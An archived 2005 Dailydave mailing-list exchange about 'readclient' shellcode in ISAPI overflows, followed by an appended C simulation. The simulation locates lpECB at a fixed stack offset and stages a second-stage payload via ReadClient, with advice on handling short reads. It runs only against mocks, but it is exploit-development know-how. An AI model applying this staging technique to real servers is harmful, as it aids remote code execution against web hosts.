Dailydave: Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness

From: Dave Aitel <dave_at_immunitysec.com>
Date: Fri, 07 Jan 2005 13:39:00 -0500

halvar_at_gmx.de wrote:

>
> Readclient shellcode is the obvious way to go when doing ISAPI. The retrieval
> of the connection ID is in most cases not a problem -- very few ISAPIs I've seen
> overflow in a different thread than the one that went through HttpExtensionProc.
> In that case, unless you're very unlucky, your ESP is still intact, and unless you
> _really_ smashed the stack (e.g. memcpy(,,-1)) you will have no problem retrieving
> the lpECB from [ESP+static_offset]. Remember that stack frame sizes are constant
> for a given executable, and that you can just rely on a value you figured out in your
> own debugger here. Of course, you have to adjust 1 offset in the shellcode to make
> it work for different targets.
>
(The following note is stuff Halvar and a lot of people already know or
find too obvious to mention, but not everyone does)

This is true in some cases, but not in others (heap overflows, even some
stack overflows). A good ISAPI code will handle those cases. It's nice to
avoid that extra step, in any case. :>

-dave
_______________________________________________
Dailydave mailing list
Dailydave_at_lists.immunitysec.com
https://lists.immunitysec.com/mailman/listinfo/dailydave
Received on Jan 07 2005
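As an added illustration, not code from this thread or from Immunity: a plain-C simulation of the two steps Halvar describes, fetching lpECB from a fixed offset off ESP and then pulling a second stage down the same connection with ReadClient. It uses a cut-down stand-in for EXTENSION_CONTROL_BLOCK (only cbSize, dwVersion, ConnID and ReadClient, keeping the real ReadClient contract of an in/out size argument), a constructed byte string in place of what the client sends after the overflowing request, a constructed array in place of the thread's stack, and a mock ReadClient that forces short reads. The function names, the offset value and the stand-in struct are illustrative assumptions, not the Windows header.

```c
/* Added example, not from the Dailydave thread. The real ISAPI types live in
 * httpext.h on Windows; the struct below is a simplified stand-in (assumption)
 * that keeps only the members this example touches, so it builds anywhere. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef uint32_t DWORD;
typedef int BOOL;
typedef void *HCONN;

/* Stand-in for EXTENSION_CONTROL_BLOCK (only the members used here). */
typedef struct ecb {
    DWORD cbSize;          /* sizeof(EXTENSION_CONTROL_BLOCK) */
    DWORD dwVersion;       /* ISAPI version */
    HCONN ConnID;          /* opaque per-request connection handle */
    /* Real contract: *lpdwSize is the buffer size on entry and the number of
     * bytes actually read on return; 0 bytes read means the client is done. */
    BOOL (*ReadClient)(HCONN ConnID, void *lpvBuffer, DWORD *lpdwSize);
} ECB;

/* Constructed "wire": the bytes the client sends after the overflowing
 * request, i.e. the second stage the shellcode wants to pull. */
static const unsigned char g_wire[] = "STAGE2:constructed-second-stage-payload";
#define WIRE_LEN (sizeof(g_wire) - 1)

struct conn_state { size_t off; size_t max_chunk; };

/* Mock ReadClient: serves g_wire in chunks of at most max_chunk bytes so the
 * caller has to cope with short reads, as a real server may make it do. */
static BOOL mock_ReadClient(HCONN ConnID, void *buf, DWORD *lpdwSize) {
    struct conn_state *c = (struct conn_state *)ConnID;
    size_t left = WIRE_LEN - c->off;
    size_t n = *lpdwSize;
    if (n > c->max_chunk) n = c->max_chunk;
    if (n > left) n = left;
    memcpy(buf, g_wire + c->off, n);
    c->off += n;
    *lpdwSize = (DWORD)n;
    return 1;
}

/* Step 2 of the technique: once lpECB is known, keep calling ReadClient on the
 * same connection until `want` bytes are staged or the client stops sending.
 * Returns the number of bytes staged. */
size_t stage_via_readclient(ECB *ecb, unsigned char *dst, size_t want) {
    size_t got = 0;
    while (got < want) {
        DWORD n = (DWORD)(want - got);
        if (!ecb->ReadClient(ecb->ConnID, dst + got, &n) || n == 0)
            break;             /* call failed or client closed the connection */
        got += n;
    }
    return got;
}

/* Step 1 of the technique: lpECB sits at a constant distance from ESP because
 * frame sizes are fixed for a given build. `stack` is a constructed array of
 * machine words standing in for the thread's stack, `esp_index` for ESP, and
 * `static_offset` is measured in words (assumption, for the simulation). */
ECB *lpecb_from_stack(const uintptr_t *stack, size_t esp_index, size_t static_offset) {
    return (ECB *)stack[esp_index + static_offset];
}

/* Runs both steps against the constructed stack and wire. Writes the staged
 * bytes into `out` (up to `cap`) and returns how many were staged. */
size_t demo(unsigned char *out, size_t cap) {
    struct conn_state cs = { 0, 7 };             /* 7-byte chunks: short reads */
    ECB ecb = { (DWORD)sizeof(ECB), 0x00060000u, (HCONN)&cs, mock_ReadClient };
    uintptr_t stack[16] = { 0 };
    const size_t esp = 3, offset = 5;            /* illustrative values */
    stack[esp + offset] = (uintptr_t)&ecb;       /* HttpExtensionProc's lpECB */
    ECB *found = lpecb_from_stack(stack, esp, offset);
    size_t want = WIRE_LEN < cap ? WIRE_LEN : cap;
    return stage_via_readclient(found, out, want);
}

int main(void) {
    unsigned char buf[64] = { 0 };
    size_t n = demo(buf, sizeof buf);
    printf("staged %zu bytes: %.*s\n", n, (int)n, buf);
    return 0;
}
```

The point of the mock's 7-byte chunks is the failure mode that bites in practice: ReadClient is allowed to return fewer bytes than requested, so shellcode that issues one ReadClient and jumps into the buffer will execute a partially filled stage. Looping on the returned size, as stage_via_readclient does, is the fix.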